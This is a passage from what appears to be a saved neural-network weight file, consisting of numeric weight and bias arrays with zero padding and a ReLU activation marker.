-0.9614], [-0.006405, 0.0338, 0.02007, -0.7466, -1.011], [-0.02055, 0.02382, -0.007103, 0.00993, -0.001959], [-0.7744, -0.05118, -0.0953, -0.1079, -0.07135], [0.002142, -0.01072, -0.01935, -1.044, -1.194], [-1.18, 0.01293, 0.00464, -0.4253, -0.289], [-0.02147, 0.00214, -0.01901, -0.04565, 1.11], [-0.02924, -1.563, 1.304, 0.02971, -0.32], [0.01978, 0.2014, 0.6055, -0.468, 0.4976], [-0.5063, -0.621, 0.6265, 0.2751, -0.4314], [0.05313, -0.1869, -0.1262, -0.314, -0.1046], [-0.06305, -0.07623, 0.3306, -0.07404, -1.583], [-0.734, 0.0413, -0.4465, -0.00971, 0.3315], [-1.464, -0.06696, 0.746, 0.1406, 0.03827], [-0.1494, 1.04, -1.336, 0.2732, -0.4983], [-0.3047, -0.03793, -0.1641, -1.191, 0.0791], [-1.712, 0.01578, 0.01987, 0.1465, -0.2678], [0.02596, -1.187, -0.02985, 0.1655, -0.1595], [-0.02158, 0.3416, 0.4526, -0.2312, 0.04404], [-1.963, 0.154, 0.01377, 0.0818, -0.1252], [-0.02193, -0.002432, 0.00803, 0.004776, 0.006413], [-0.05017, 0.2764, -0.3818, -0.502, -1.458], [0.2986, 2.133, -0.626, 0.1854, -0.2485], [-1.387, -0.007572, -0.1328, -0.115, -0.0879]]
[-0.421252, 0.24803, 0.0664654, -0.744869, -0.0409261, 0.0138727, -0.258448, -0.0856601, -0.106106, -0.276391, 0.200527, -0.129985, -0.432665, -0.358543, -0.665139, -0.166964, -0.292224, -0.725142, 0.165481, -0.621433, -0.61701, -0.563115, 0.0451245, -0.362211, -0.127283, -0.289099, 0.140683, -0.116706, -0.0303211, 0.00203918, -0.979589, -0.559148, 0.183829, 0.0359596, 0.0331432, -0.0563382, 0.112215, -0.610066, -0.133693, -0.389712, 0.229969, -0.514067, -0.486847, 0.0692628, 0.0478197, -0.367712, -0.0180491, -0.563606, 0.0282498, -0.209655, -0.4211, 0.248, 0.06647, -0.7446, -0.04092, 0.01387, -0.2585, -0.08563, -0.1061, -0.2764, 0.2006, -0.13, -0.4326, -0.3586, -0.665, -0.167, -0.2922, -0.725, 0.1655, -0.6216, -0.617, -0.563, 0.04514, -0.3623, -0.1273, -0.289, 0.1406, -0.1167, -0.03032, 0.002039, -0.9795, -0.559, 0.1838, 0.03595, 0.03314, -0.05634, 0.11224, -0.61, -0.1337, -0.3896, 0.23, -0.514, -0.4868, 0.0693, 0.04782, -0.3677, -0.01805, -0.5635, 0.02824, -0.2096]
ReLU
[[-0.190802, -0.00758437, -0.0920271, 1.09324, 0.317222, -2.37381, 0.234736, -0.13727, 0.63011, 1.4454, -0.116976, -0.134363, -0.449532, -0.833038, 0.673238, 0.196814, -0.149231, 0.630408, -0.00305633, 0.747228, -0.0279406, 0.805203, 0.321111, 0.370958, 0.419294, 0.0775577, -0.468713, -0.251091, -0.00977363, 0.596266, 2.35509, 1.07718, -0.675094, -0.11155, -1.05279, 0.486709, -0.0539065, 0.83709, 0.171526, 0.54523, -0.192565, 1.03262, 0.153308, -1.15418, -0.0428594, 0.312743, 0.0443241, 0.0286834, -0.797369, 0.472735, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.880953, -1.62702, -0.652086, -0.351992, 0.378622, -0.0769754, 0.210195, 0.191709, 0.107091, -0.0713066, 0.605431, 0.400752, 0.94048, 0.0522567, -1.0887, -0.355845, -0.223769, 1.1169, -0.718492, 1.13499, -0.278796, 0.551892, 0.495525, 0.571399, -0.24201, 0.100507, -1.18619, 0.0880787, -0.0289095, 0.0509083, 1.83171, 0.6862, -0.39929, 0.114441, 0.889684, -0.0490691, -0.566421, -0.57235, 0.143374, -1.14329, -0.728916, 0.0586127, 0.743539, 0.167517, 0.802824, 0.949741, -0.0249468, 0.285229, -0.168877, 0.62642, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.223809, 1.73253, -0.333675, 0.099225, 0.129259, 0.505276, 0.118743, -0.0811119, -0.2675, 0.157231, 0.333774, 0.168241, -0.500814, -0.0716592, 0.174983, -0.0192222, -0.141102, 0.714263, -0.873274, -0.323866, -0.0762606, -0.582453, -0.420127, 0.0748219, -0.0944211, 0.133654, 0.531037, 0.155852, -0.0457821, -1.47148, -0.19564, -0.900291, -0.241527, 0.03827, -0.241427, -0.643028, 0.869941, -0.891437, -0.314241, 0.449545, 0.0876528, 0.0415615, -0.196312, 
0.181724, 0.170896, -0.683005, -0.0181579, 0.284871, -0.0542546, -1.10351, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.14518, 0.0818213, -0.225119, 1.17954, -0.90843, -0.0702841, 0.974185, 2.05023, 0.256359, 0.521352, -0.18215, 0.0185395, 0.295377, 0.807731, -1.57681, -1.34927, -0.0419784, 1.1522, -0.165635, -0.543042, 0.854822, 0.152768, -0.253338, 0.0880828, -0.465364, 0.197129, 0.62888, 1.27953, 0.00389209, 0.329963, -3.23497, -0.428656, -0.350389, 0.850962, 0.951346, 0.012416, 0.50271, 1.38659, -0.227507, -0.155618, 0.874422, 0.971363, 0.0988053, -0.317474, 0.10135, -0.0312873, -0.0167854, 0.915046, -0.276131, -0.151493, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.586365, -0.0125228, 0.340055, 1.76193, -0.488093, -0.570386, 0.287412, -0.0531648, 0.118813, -0.624788, 0.97593, 0.0559254, -0.225465, -0.412086, -1.09812, -0.27209, 0.831464, 1.17618, -0.254836, -0.762673, -0.83506, -1.05776, -0.933027, 0.105781, -0.257661, -0.375572, 0.172253, 0.518861, -0.00604989, -0.120287, 0.58444, 0.365653, -0.139513, -1.03574, -0.319755, -0.133227, -0.1512, -0.0735516, -0.24897, 0.125951, 0.16578, -0.136545, -0.439206, -0.508392, -0.0218843, -0.228847, 0.0378875, 0.0250818, 1.51312, -0.237713, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.45547, 0.00346024, -0.595265, 0.514149, -0.413331, 0.0062681, 0.339499, -0.459038, 0.173837, -0.125554, 0.521886, 
0.301428, 0.3989, 0.216619, 0.912058, -0.847605, -0.300187, 0.500257, -0.126847, -0.905694, 1.42402, -0.00573388, 0.35436, -0.142974, -0.641151, 0.29777, 0.358672, 0.884687, 0.0123819, -0.0282268, -1.53491, -0.135031, 0.588786, -0.782166, 0.156146, -0.434115, 1.29452, -3.63568, 0.258365, -0.208532, -0.773367, -0.223863, -0.201964, -0.95394, -0.0600814, -0.390557, 0.00967142, -0.620447, -0.151373, 0.0589998, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.138294, -0.0713555, -1.17633, -0.316026, 0.150722, 0.0461899, -0.338576, -0.174497, 0.284251, -0.190334, -1.29619, 0.108382, 0.146606, -0.190855, 0.282111, -0.0173808, 0.720767, -0.428999, -0.218419, -0.262456, 0.184826, -0.706586, 0.202993, -0.0022203, -0.422308, 0.509199, -0.00798663, 0.07551, 0.0248856, -0.103669, 0.364173, 0.641305, 0.462768, -0.206061, -0.880251, -0.0921624, 0.0414831, -2.06763, 0.0255998, -0.877493, 0.113112, 0.129349, 0.492856, 0.108522, -0.17548, 0.15049, -0.00117929, -0.089728, -0.409479, -0.0722953, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.507594, -0.0514999, 0.552249, -1.41839, 0.0553786, 0.532326, 0.164535, -0.0977133, -0.526348, -1.25539, -1.1896, 0.0702711, -0.231412, -0.283693, 0.581987, -0.0437625, 1.0682, 0.767292, -0.652843, 0.0172681, 0.557888, 0.515318, 0.870824, -0.0481142, -0.756185, -0.869735, 0.372673, 0.186523, 0.00375031, 0.192652, -3.38056, 0.129031, 0.362547, -0.389943, 1.48598, -0.108194, -0.400056, -0.493318, 0.153324, -0.124801, -1.1367, -0.296325, -0.0315782, 0.923442, 1.07506, 0.187128, -0.0263081, -1.3092, -0.299209, 0.185622, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.266464, -0.122096, 0.0219648, -1.07045, -0.136862, -0.0489383, 1.23135, -0.33214, 0.0968364, -0.127091, -0.316545, -0.0644938, 0.132866, 0.47323, 0.756255, 0.35432, 0.0368466, 0.891473, -0.977332, -0.911899, 0.148429, -1.06048, -0.127875, 0.0542686, 0.287741, 0.0512203, -0.675597, -0.780057, 0.0291947, 0.0261419, 0.434535, 0.941041, -1.5446, 0.0637777, -0.121769, -0.276515, 0.716986, 0.141397, -0.155097, 0.0301562, 0.0250848, 0.362314, -0.355492, -0.172818, 0.401601, -0.287012, 0.0253213, 0.71056, -0.143598, 0.145539, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.668069, -0.64937, 0.406658, -0.889944, -1.32305, 1.06248, 0.79558, -1.81257, -1.62818, -2.08995, 0.298561, -0.552885, -1.82267, -0.547442, 0.721016, 0.793254, 0.606734, -0.230722, 0.00117912, 1.15487, -0.209082, -0.564108, -0.21581, -0.17971, 0.0655516, 0.208879, -0.954159, -0.483194, -0.00343854, 0.246842, 1.69629, 2.227, -1.66662, -0.43812, -0.234226, -0.358203, -1.35676, 0.21259, -0.417905, -0.749533, 0.0430135, -2.26856, 2.14624, 0.811786, -1.50414, -0.201517, -0.0300535, 0.253204, 1.28052, 0.231715, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.675616, -0.0230078, -0.892309, 0.195386, -0.555112, 0.258192, -0.540221, -0.459557, 0.245615, 1.30105, -0.1587, 0.183754, -0.061843, -0.0952268, 0.434325, -0.471016, -0.151857, 1.58238, 0.196877, 1.85387, -0.320607, 0.557267, 
-0.0609182, -0.0588986, -0.677041, 0.341294, -0.23116, 0.666366, 0.00458047, -0.078292, -0.786694, 0.980184, 0.803159, 0.574715, -0.124391, 0.448125, 0.524148, -0.889563, 0.0916526, 0.0712049, -0.817497, -0.158341, -0.645128, -0.342665, 0.654033, -0.085302, 0.0430531, -0.416267, -0.343646, 0.214224, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0501221, 0.060854, -0.637635, 0.017068, 0.0787262, -0.106261, 0.379029, 0.445583, 0.154545, 0.117457, -1.05865, -0.33458, 0.224615, -0.258844, -0.792872, -0.317685, -0.498715, 0.584523, -0.280805, -0.219326, 0.352946, 0.103119, 0.899889, -0.0138282, -0.316447, 0.216854, -0.629176, 0.0895064, -0.0285921, -0.48096, 0.115354, -0.255346, -0.46165, 0.0640028, 0.916662, 0.212014, -0.0516598, 0.258601, 0.279114, -0.00376369, -0.423447, -0.092829, 0.0353234, -0.11531, 0.616939, -0.25572, 0.012723, -0.197993, 0.0465763, -0.454985, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.208623, 0.0680264, 0.0302068, 0.895312, 0.66498, 0.430488, -1.26986, -0.295672, 0.324519, 0.619809, 0.547991, -0.296623, -0.687372, -0.133778, 0.635782, -0.341594, -0.377277, -0.188609, 1.83977, 0.106085, -0.186324, 1.59226, -0.0991222, -0.0257417, 0.909452, -0.159076, -0.711959, 0.926227, 0.0122387, -0.483696, 1.31829, 0.741946, 0.259898, 0.5944, -1.16722, -0.121421, -0.0820436, 0.204539, 0.428622, 0.593306, 0.842264, -0.439903, -0.685612, -0.13243, -0.204501, 0.185935, -0.0240131, -0.71815, 0.596123, 0.0990866, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.567493, -0.405514, -1.80211, -0.309432, 0.905971, 0.528761, -0.230282, -0.0266546, 0.0720728, 0.931902, -1.39689, -0.293715, 0.299016, -0.628125, 0.222204, -0.222478, -1.23718, 1.63712, 0.302932, -1.34512, 0.568905, 0.491569, 0.0141597, 0.597812, -0.0123975, -0.983078, -0.200736, 0.912883, 0.0071778, -0.168526, -2.06091, 0.940526, -0.665433, -1.0443, -0.475679, 0.916632, 0.587468, 0.460772, 0.0413646, 1.26358, 0.325798, 0.169313, -0.134727, -0.506792, 0.00340328, -0.853717, -0.00138781, -1.00036, 1.28592, -0.0390045, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.207693, 0.0424778, -0.496511, -0.958162, 0.110534, 0.0430363, -0.581582, -0.381683, -0.136716, -0.435406, -0.401493, 0.0507256, -0.124781, -0.0936797, 1.69472, 0.191705, 1.38225, 0.465489, 0.381591, 0.643792, -0.0950129, -0.00530051, 0.397914, -0.0115105, 0.0685479, -0.34888, 0.26638, 0.330644, -0.0452523, 0.124738, 0.0681441, 0.32322, 0.500237, -0.196965, -0.0836244, 0.158894, 0.630903, 0.400042, -0.41153, 0.134731, -0.191008, -1.01422, -0.691875, 1.02128, -0.856139, -0.297604, -0.0178588, -1.16444, -0.484831, 0.141784, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00818408, -0.0348139, 0.0389273, -0.0199657, -0.0284338, -0.0530231, -0.0443782, 0.0297783, -0.0423825, -0.000883216, -0.0339524, -0.0443599, -0.0414405, -0.025108, 0.00161758, -0.0194437, -0.0301773, -0.00349553, -0.0409724, -0.00391195, 0.0050569, 0.0268362, 0.0143436, -0.0212317, 0.0129942, -0.00186956, -0.00831822, 
0.0209765, -0.022076, -0.00014602, -0.0508547, -0.0283406, -0.0420875, -0.024933, 0.0349469, 0.0278358, 0.0231051, -0.0425398, 0.0367179, -0.0183758, -0.050241, 0.0224473, -0.000396286, 0.0144694, -0.0260841, 0.0343676, 0.0125252, 0.0156554, -0.0228026, 0.0124546, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.185604, -0.0295177, 0.667728, 1.29191, 0.00631239, -3.9059, -0.185471, -0.375549, -0.998572, 0.316136, -0.883604, -0.00986804, -0.780975, -0.0124423, -1.26651, 0.546283, -0.311956, 0.273094, -0.211629, -0.586668, 0.307147, 1.57907, -0.64022, 0.0422142, -0.0338828, -0.498055, 0.29554, -0.131524, 0.0200743, 0.11395, 1.43598, 1.86624, 0.0280859, -0.39664, 0.455871, -0.0131438, -0.136247, 0.0942204, 0.898, 0.880547, 0.0700585, -0.411825, 1.41965, -0.125566, 0.272288, 0.252202, 0.00716719, -0.0758884, 0.599989, 0.157278, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-3.26462, 0.0710221, 0.233773, -6.6128, 0.080372, -0.0217208, -0.19433, 0.535023, 0.365539, -2.61957, 0.242974, -0.092644, -0.251485, 0.71084, 1.08206, -1.48036, -0.113148, 1.26828, 0.734797, 2.90208, -0.122521, 0.203373, -0.156238, 0.019531, -0.599339, 0.646111, -2.01284, 1.45973, -0.0291765, 0.108116, -0.00478547, 2.99937, -2.06978, 0.530956, -0.461387, -0.187865, -0.243825, -0.342867, 0.131226, -0.0266605, 0.00765041, -2.48813, -0.475482, -0.0621756, 0.1371, -0.120618, 0.0231615, -0.0838345, -1.66595, 0.24073, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.265591, -0.143651, -0.599815, -0.460085, 1.15738, 0.139611, 0.365107, 0.778169, 0.546343, -0.238748, -0.711035, -0.078982, 0.0284684, 0.0857233, 0.541074, 0.0360264, 0.498843, 1.17904, -0.0748138, 0.246503, -0.396839, 1.44922, -0.16238, -0.381943, -0.585806, 0.807992, -1.45462, -0.300736, 0.0618963, 0.455942, 0.593126, 0.53659, -0.708316, 0.105724, -0.362106, 0.81094, -0.599333, -0.386897, -0.308542, 1.51272, 0.261257, -1.67261, 0.82896, 0.109723, 0.27649, -0.345866, -0.0425323, 0.486706, -0.0473212, 0.70982, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.192668, 0.117958, 0.0165421, 1.53395, 0.328993, -0.245844, 0.872514, 0.628621, 0.104873, -1.19616, 0.337602, 0.175327, 0.514677, -0.339829, -1.22238, -0.313887, -0.15503, -0.529562, -0.0362781, -0.923275, 0.400213, -0.810796, 0.15092, 0.152025, -0.748315, 0.317655, -0.167599, 0.0267164, -0.00731216, -0.194377, -0.131841, 0.0616002, 0.0532725, -1.03357, 0.126388, 0.313202, -0.157074, 0.738003, 0.250175, -0.293995, -0.19065, -0.0491177, -0.264018, 0.027398, -0.0619699, 0.385248, -0.0405702, -0.0923901, -0.379824, 0.107243, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.161734, 0.203872, 0.640685, 1.7027, 0.047434, -0.136723, -0.0510796, 1.43481, 0.64795, -1.07741, 0.460653, 0.752072, 0.170281, -0.149845, -0.821689, 3.51217e-05, 0.76137, 0.0285244, -0.377589, 1.11147, 0.148948, -0.090949, 0.170501, 0.0399197, -1.4668, 0.118909, -0.191517, 0.109912, -0.0374318, 0.0250646, -3.2788, -0.160637, 0.495105, -1.65937, 0.607138, -0.0431666, 0.477297, 
-0.188691, -0.572719, -0.208499, -0.954885, 1.0546, -0.543787, 0.0534491, 0.200521, 0.127108, -0.0318949, -1.08385, -1.03341, 0.12609, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.188177, -0.411406, -0.896618, -0.703802, 0.240709, -0.599808, -0.508706, -0.422922, 0.553474, -0.361447, -1.44929, -0.0844063, 0.219099, 0.524791, 0.3095, -0.194167, 0.133102, 0.624892, 0.378208, -0.606421, 0.149818, 1.22898, -0.0347799, 0.905147, -0.339347, 0.103059, -0.223631, 0.142914, 0.0493219, 0.147786, -0.529792, 0.632014, 0.131595, 0.912824, -0.210146, 0.185044, -0.272321, -0.498203, 1.04523, -0.0697466, 0.61814, -0.422931, -0.0768065, -0.0734682, 0.270916, 0.0662151, -0.0247586, -0.0853778, -0.166939, 0.88423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0716973, -0.0321429, 0.995733, 1.65158, 0.4486, -0.2668, -0.279997, -0.295772, -0.0274633, 0.894018, 0.44209, -0.0459541, -0.247326, -0.285901, 0.359705, 0.162596, 0.101761, -2.02761, 0.249227, -0.265854, 0.606784, 3.77775, -0.390437, -0.194477, -0.245431, 0.0586054, -0.0894925, 0.343451, -0.0168846, 0.664829, -1.17053, 0.311021, 0.323193, -0.791682, 0.259467, 1.23814, -0.288636, -0.693498, -0.655983, 1.53559, 0.124918, 0.412381, 1.44981, 0.929878, -0.412055, 0.885917, 0.0106018, -0.295417, -0.461025, 0.827771, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00213756, -0.0177322, -0.0372171, 0.0354855, -0.0379738, 
0.0117428, -0.0121942, 0.0375851, -0.0119044, -0.033455, -0.00826878, -0.0216166, -0.0437959, 0.0204018, -0.00300489, -0.0321401, -0.0108619, 0.0342246, 0.0397044, -0.0132903, 0.0281059, -0.0130442, 0.00795963, -0.0269545, -0.0526397, -0.014759, 0.030816, -0.0547975, 0.00157945, -0.0292682, -0.0353629, -0.0448542, -0.016911, -0.00566901, -0.00430547, -0.0434755, -0.0427578, -0.0201945, 0.0287031, -0.0139538, -0.057616, -0.0459023, 0.0286891, -0.0524381, -0.0215663, 0.0330415, 0.0352593, 0.0125468, 0.0245162, -0.0510235, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.03011, -0.0405279, 0.0108045, 0.0401139, 0.0190238, 0.0324352, -0.00484946, -0.00163389, -0.0138208, -0.0479658, -0.0359132, -0.0272989, -0.0382358, -0.0311243, -0.0590816, 0.0268027, -0.0393461, 0.0393425, 0.0153631, -0.0390952, 0.00700256, 0.0114334, -0.00781544, -0.0119168, -0.0415509, -0.0206005, 